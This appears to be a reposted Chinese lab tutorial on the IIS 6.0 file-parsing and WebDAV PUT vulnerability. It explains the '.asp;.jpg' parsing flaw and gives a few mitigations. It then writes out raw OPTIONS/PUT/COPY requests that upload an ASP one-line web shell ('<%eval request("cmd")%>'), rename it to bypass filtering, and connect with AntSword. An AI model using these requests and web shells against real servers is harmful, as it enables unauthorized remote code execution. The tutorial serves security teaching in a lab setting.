IIS6.0文件解析漏洞
生活随笔
收集整理的這篇文章主要介紹了
IIS6.0文件解析漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
一、相關知識
1、IIS6.0解析漏洞介紹
2、IIS6.0PUT上傳原理
?3、IIS6.0解析文件類型
4、IIS6.0文件解析漏洞修復方案
二、環境配置
三、文件上傳
1、設置代理
?2、靶機環境配置
?3、截取數據包
?4、探測漏洞
?5、創建文件,并寫入一句話木馬
?6、復制文件并重命名,繞過攔截
四、蟻劍連接
一、相關知識
1、IIS6.0解析漏洞介紹
(1)當建立*.asa、*.asp格式的文件夾時,其目錄下的任意文件都將被IIS當做asp文件解析。
(2)當文件*.asp:1.jpg IIS6.0同樣會將文件當做asp文件解析。
2、IIS6.0PUT上傳原理
WebDAV基于HTTP1.1協議的通信是的HTTP支持PUT、MOVE、COPY、DELETE方法。
(1)探測是否存在IIS漏洞:
OPTIONS / HTTP1.1 Host:www.xxx.com?(2)上傳txt文本文件
PUT /文件名.后綴名 HTTP1.1 Host:www.xxx.com Content-Length:30 <%eval request(“chopper”)%>?(3)通過MOVE或COPY重名
COPY /文件名.后綴名 HTTP1.1 Host:www.xxx.com Destination:http://www.xxx.com/重命名的文件名.后綴名;.后綴名(4)刪除
DELETE /文件名.后綴名 HTTP1.1 Host:www.xxx.com?3、IIS6.0解析文件類型
IIS6.0默認的可執行文件為:.asp、.asa、.cer、.cdx
4、IIS6.0文件解析漏洞修復方案
(1)目前尚無微軟官方的補丁,可以通過自己編寫的正則阻止XX.asp;.jpg類型的文件名。
(2)做好權限設置,限制用戶創建文件夾
二、環境配置
| 攻擊機: | kali | IP: | 192.168.2.2 |
| 靶機: | Windows2008 | IP: | 192.168.2.130:8058 |
三、文件上傳
1、設置代理
(1)瀏覽器設置代理
?(2)Burpsuite設置代理
?2、靶機環境配置
(1)設置寫入權限
?(2)設置WebDAV為允許
?3、截取數據包
?4、探測漏洞
?5、創建文件,并寫入一句話木馬
木馬:<%eval request("cmd")%>?6、復制文件并重命名,繞過攔截
四、蟻劍連接
連接目標URL:192.168.2.130:8058/123.asp;.txt 密碼:cmd?
?
?
?
?
總結
以上是生活随笔為你收集整理的IIS6.0文件解析漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 虚拟机中安装配置Windows serv
- 下一篇: 决策树系列(二)——基于决策树算法实现泰